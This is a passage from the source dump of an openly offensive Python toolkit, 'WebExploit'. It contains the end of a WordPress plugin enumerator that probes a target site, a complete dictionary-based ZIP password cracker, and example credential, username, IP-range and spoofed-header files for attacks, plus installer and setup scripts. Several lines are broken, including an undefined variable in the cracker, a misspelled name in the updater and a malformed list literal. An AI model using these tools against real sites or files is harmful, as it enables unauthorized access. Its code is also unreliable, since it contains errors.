189 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] OPENNING {bold}DEFAULT{nbold} TOP PLUGINS FILE {bold}{f.GREEN}\n')
190 | filedefault = (f'{os.getcwd()}/cores/wp-plugins.txt')
191 | plugins = open(filedefault, 'r').read().split()
192 | t.sleep(2)
193 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}DEFAULT{f.WHITE}] LOADED {bold}%s PLUGINS{nbold}{f.GREEN} SUCCESS ...{white}\n' % len(plugins))
194 | t.sleep(2)
195 |
196 | bw_ = ['chrome','firefox','opera']
197 | os_ = ['win','mac'',lin']
198 |
199 |
200 | if url[-1:] == '/':
201 | pass
202 | else:
203 | url = (f'{url}/')
204 |
205 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{nbold}{f.WHITE}] {bold}WPF{nbold} LAUNCH ATTACK . . . \n')
206 | t.sleep(2)
207 | for plugin in plugins:
208 |
209 | # browser = choice(bw_)
210 | # operation_system = choice(os_)
211 | #
212 | #
213 | # headers = Headers(
214 | # browser=browser,
215 | # os=operation_system,
216 | # headers=True).generate()
217 |
218 | urlq = (url+"wp-content/plugins/"+plugin)
219 | 'if have error set headers in Result'
220 | try:
221 | Result = r.get(urlq)
222 | except Exception as err:
223 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} HAVE {err} ERROR ! IN URL {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n')
224 | continue
225 | if Result.status_code == 200:
226 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{bold}{f.GREEN}{Result.status_code}{nbold}{f.WHITE}] PLUGINFOUNDED {f.WHITE}~> [{f.GREEN}{bold}{urlq}{nbold}{f.WHITE}] \n')
227 | #elif ?
228 | if Result.status_code == 404 or Result.status_code == 500:
229 | print (f' {f.WHITE}[{f.YELLOW}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{bold}{Result.status_code}{nbold}{f.WHITE}] PLUGIN NOT FOUND {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n')
230 | #elif ?
231 | if Result.status_code == 403:
232 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}WPF/{f.WHITE}STATUS-{bold}{f.RED}{Result.status_code}{nbold}{f.WHITE}]{f.RED} FORBIDDEN {f.WHITE}~> [{f.RED}{bold}{urlq}{nbold}{f.WHITE}] \n')
233 | #elif ?
234 | # if Result.status_code in range(499,600):
235 | # print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} SERVER ERROR {f.WHITE}~> [{f.YELLOW}{urlq}{nbold}{f.WHITE}] \n')
236 |
237 | # if Result.status_code == 301 or Result.status_code == 302:
238 | # print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.CYAN} REDIRECT {f.WHITE}~> [{f.YELLOW}{urlq}{nbold}{f.WHITE}] \n')
239 |
240 | else:
241 | pass
242 |
243 |
244 |
245 |
246 |
247 |
--------------------------------------------------------------------------------
/cores/zipc.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | 'pip install google-search'
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | import zipfile
31 | from random import choice
32 | except:
33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
34 | t.sleep(1)
35 | sys.exit()
36 |
37 | black = "\033[0;30m"
38 | red = "\033[0;31m"
39 | green = "\033[0;32m"
40 | brown = "\033[0;33m"
41 | blue = "\033[0;34m"
42 | purple = "\033[0;35m"
43 | cyan = "\033[0;36m"
44 | l_gray = "\033[0;37m"
45 | dark_gray = "\033[1;30m"
46 | l_red = "\033[1;31m"
47 | l_green = "\033[1;32m"
48 | yellow = "\033[1;33m"
49 | l_blue = "\033[1;34m"
50 | l_purple = "\033[1;35m"
51 | l_cyan = "\033[1;36m"
52 | l_white = "\033[1;37m"
53 | faint = "\033[2m"
54 | italic = "\033[3m"
55 | underline = "\033[4m"
56 | blink = "\033[5m"
57 | nefative = "\033[7m"
58 | cross = "\033[9m"
59 | ended = "\033[0m"
60 | bold = "\033[1m"
61 | nbold = "\033[0m"
62 | white = f.WHITE
63 |
64 | bnr = ['''
65 | ▒███████▒ ██ ██▓███
66 | ▒ ▒ ▒ ▄▀░ ▒▓██ ▓██░ ██
67 | ░ ▒ ▄▀▒░ ░▒██ ▓██░ ██▓▒
68 | ▄▀▒ ░ ░██ ▒██▄█▓▒ ▒
69 | ▒███████▒ ░██ ▒██▒ ░ ░
70 | ░▒▒ ▓░▒░▒ ░▓ ▒▓▒░ ░ ░
71 | ░ ▒ ▒ ░ ▒ ▒ ░▒ ░
72 | ░ ░ ░ ░ ░ ▒ ░░
73 | ░ ░ ░ ''', '''
74 | ░▒█▀▀▀█░░░▀█▀░░░▒█▀▀█
75 | ░░▄▄▄▀▀░░░▒█░░░░▒█▄▄█
76 | ░▒█▄▄▄█░░░▄█▄░░░▒█░░░ ''']
77 |
78 | def r_bnr(bnr):
79 | return choice(bnr)
80 |
81 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
82 | t.sleep(2)
83 | print(f' {italic}From{ended} : ', end='')
84 | #create flush text [simple]
85 | print(f'{red}{bold}', end='', flush=True)
86 | print(f'{bold}W', end='', flush=True)
87 | t.sleep(0.5)
88 | print('e', end='', flush=True)
89 | t.sleep(0.7)
90 | print('b', end='', flush=True)
91 | t.sleep(0.4)
92 | print('E', end='', flush=True)
93 | t.sleep(0.1)
94 | print('x', end='', flush=True)
95 | t.sleep(0.2)
96 | print('p', end='', flush=True)
97 | t.sleep(0.3)
98 | print('l', end='', flush=True)
99 | t.sleep(0.4)
100 | print('o', end='', flush=True)
101 | t.sleep(0.5)
102 | print('i', end='', flush=True)
103 | t.sleep(1.5)
104 | print(f't{ended}', flush=True)
105 | nbold = "\033[0m" # tahe koskholi !
106 | t.sleep(1)
107 | print(f'{white}{nbold}')
108 |
109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}ZIP{f.GREEN}]{f.WHITE}{f.RED} Z.I.P{f.WHITE}{bold} ZIP {bold}C{nbold}racker T00L !\n\n\n')
110 | t.sleep(3)
111 |
112 |
113 |
114 |
115 | while True:
116 | try:
117 | zipc = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}FILE[zip]{nbold}{f.WHITE} enter {bold}\'zipFile{nbold}\' [ex: /Desktop/mji.zip]:#{f.GREEN}{bold} ')
118 | print(f'{nbold}')
119 |
120 | if zipc:
121 | break
122 | else:
123 | input('please enter a zip file')
124 | continue
125 |
126 | except Exception as err_zipc:
127 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}ERROR -> {err_zipc}{nbold} EXITTING . . .')
128 | t.sleep(2)
129 | # break
130 | sys.exit(0)
131 | while True:
132 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/ssh-passwords.txt]:#{f.GREEN}{bold} ')
133 | if passwords:
134 | try:
135 | passes = open(passwords, 'r').readlines()
136 | # passes.close()
137 | break
138 | except Exception as file_err:
139 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}RARC/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
140 | t.sleep(1)
141 | continue
142 | t.sleep(1)
143 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}zip-cracker . . . !{nbold}]')
144 | t.sleep(3)
145 | try:
146 | zip_file = zipc
147 | zip_file = zipfile.ZipFile(zip_file)
148 | except Exception as g_err:
149 | print ('err : %s' % g_err)
150 | for pwd_ in passes:
151 | pwd1 = pwd_.strip()
152 | try:
153 | zip_file.extractall(pwd=pwd1.encode())
154 | print (f'\n {nbold}{f.WHITE}[{f.GREEN}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}ZIP.C/{f.GREEN}Password-Found{white}] {nbold}{f.CYAN} \'{bold}{pwd_}{nbold}\' \n')
155 | except:
156 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}ZIP.C/{f.YELLOW}Password-NotFound{white}] {nbold}{f.RED} \'{bold}{pwd_}{nbold}\' \n')
157 | continue
158 | else:
159 | print(f'{green}')
160 | print("[ZIP-C] Password found:", word.decode().strip())
161 | exit(0)
162 | print(f'{red}')
163 | print("[ZIP-C] Password not found, try other wordlist [password-lists].")
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
--------------------------------------------------------------------------------
/examples/data_httpGet_example.txt:
--------------------------------------------------------------------------------
1 | user=$USER$&password=$PASSWORD$
2 |
--------------------------------------------------------------------------------
/examples/header.json:
--------------------------------------------------------------------------------
1 | {'Host': 'google.com',
2 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0',
3 | 'Accept': '*/*',
4 | 'Accept-Language': 'en-US,en;q=0.5',
5 | 'Accept-Encoding': 'gzip, deflate, br',
6 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
7 | 'X-Requested-With': 'XMLHttpRequest',
8 | 'Content-Length': '16',
9 | 'Origin': 'https://google.com',
10 | 'Connection': 'keep-alive',
11 | 'Sec-Fetch-Dest': 'empty',
12 | 'Sec-Fetch-Mode': 'cors',
13 | 'Sec-Fetch-Site': 'same-origin'}
14 |
--------------------------------------------------------------------------------
/examples/hosts_ForAngryIpScanner.txt:
--------------------------------------------------------------------------------
1 | 216.239.38.120
2 | 1.1.1.1
3 |
--------------------------------------------------------------------------------
/examples/ipRange_Example.txt:
--------------------------------------------------------------------------------
1 | 37.255.241.*
2 |
3 |
4 | #example for angry ip scanner tool [ip addr range scanner]
5 |
--------------------------------------------------------------------------------
/examples/passlist_example.txt:
--------------------------------------------------------------------------------
1 | 1234
2 | sudo
3 | root
4 | admin
5 | sudomji
6 | kskskdkd
7 |
--------------------------------------------------------------------------------
/examples/users.txt:
--------------------------------------------------------------------------------
1 | jfkwosodo
2 | sshocean-mnmnmn
3 |
--------------------------------------------------------------------------------
/files/.version:
--------------------------------------------------------------------------------
1 | 1.1.0-release-2024
2 |
--------------------------------------------------------------------------------
/files/updateControl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | from requests import get
3 |
4 | def update(ver:str=None):
5 |
6 | ver: str = open('.version', 'r').read()
7 |
8 | githubVerionController: str = get('https://raw.githubusercontent.com/C4ssif3r/WebExploit/main/files/.version').text
9 |
10 | if ver != githubVerionController:
11 | upsateQuestion = input (f'update available !\n web explloit new verion: {githubVerionController}\nare you want to update ? [y/n] ')
12 | if updateQuestion == 'y':
--------------------------------------------------------------------------------
/img/APS.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/APS.jpg
--------------------------------------------------------------------------------
/img/Infog_menu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/Infog_menu.png
--------------------------------------------------------------------------------
/img/PasswordCrack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/PasswordCrack.png
--------------------------------------------------------------------------------
/img/WebExploit.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/WebExploit.jpg
--------------------------------------------------------------------------------
/img/WebExploitMenu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/WebExploitMenu.png
--------------------------------------------------------------------------------
/img/eyecrackerMojiana.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/eyecrackerMojiana.jpg
--------------------------------------------------------------------------------
/img/history:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/img/privateWebHacking.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/C4ssif3r/WebExploit/f6f3b72d9d4495a5552220a45f1843ea9fab0d6c/img/privateWebHacking.png
--------------------------------------------------------------------------------
/installer.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | declare -a packages=(
4 | "python"
5 | "python-pip"
6 | )
7 | echo -e "\n\033[1;37m[\033[1;31mWebExploit\033[1;37m] - UPDATING PACKAGES ...\n"
8 | sleep 3
9 | if [ `id -u` == 0 ]; then
10 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - INSTALLING PACKAGES ...\n"
11 | sleep 3
12 | sudo apt update -y > /dev/null 2>&1
13 | sudo apt upgrade -y > /dev/null 2>&1
14 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n"
15 | sleep 3
16 | for packages in "${packages[@]}"; do
17 | sudo apt install $packages -y > /dev/null 2>&1
18 | done
19 |
20 | else
21 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - INSTALLING PACKAGES ...\n"
22 | sleep 3
23 | apt update -y > /dev/null 2>&1
24 | apt upgrade -y > /dev/null 2>&1
25 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n"
26 | sleep 3
27 | for packages in "${packages[@]}"; do
28 | apt install $packages -y > /dev/null 2>&1
29 | done
30 |
31 | fi
32 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n"
33 | sleep 3
34 | # finally
35 | echo -e "\033[1;37m[\033[1;31mWebExploit\033[1;37m] - \033[1;32mINSTALLING WEB-EXPLOIT REQUIREMENTS ...\033[1;37m\n"
36 | sleep 3
37 | chmod 777 setup.py
38 |
39 | python setup.py install > /dev/null 2>&1
40 |
41 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - INSTALLED SUCCESSFUL. \n"
42 | sleep 3
43 | echo -e "\033[1;37m[\033[1;32mWebExploit\033[1;37m] - NOW TYPE \033[1;32mpython WebExploit.py\033[1;37m FOR RUN :).\n"
44 | sleep 3
45 |
46 |
--------------------------------------------------------------------------------
/licence/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 MJi | DarkƤwn
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | treelib==1.6.4
2 | paramiko
3 | requests
4 | colorama
5 | fake_useragent
6 | fake_headers
7 | requests[socks]
8 | torrequest
9 | rarfile
10 | six==1.16.0
11 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | try: from setuptools import setup, find_packages
2 | except:
3 | from subprocess import Popen
4 | Popen("pip install setuptools")
5 | from setuptools import setup, find_packages
6 |
7 | def read_requirements(file):
8 | with open(file) as f:
9 | return f.read().splitlines()
10 |
11 | def read_file(file):
12 | with open(file) as f:
13 | return f.read()
14 |
15 | long_description = read_file("README.md")
16 | version = read_file("VERSION")
17 | requirements = read_requirements("requirements.txt")
18 |
19 | setup(
20 | name = 'WebExploit',
21 | version = version,
22 | author = 'Mojia',
23 | author_email = 'sudo.root.desktop@gmail.com',
24 | url = 'https://github.com/c4ssif3r/WebExploit',
25 | description = 'Advanced Hacker Toolkit in your hands. WebExploit XD',
26 | long_description_content_type = "text/x-rst",
27 | long_description = long_description,
28 | license = "MIT license",
29 | packages = find_packages(exclude=["cores"]),
30 | install_requires = requirements,
31 | classifiers=[
32 | "Programming Language :: Python :: 3",
33 | "License :: MIT License",
34 | "Operating System :: OS Independent",
35 | ]
36 | )
37 |
--------------------------------------------------------------------------------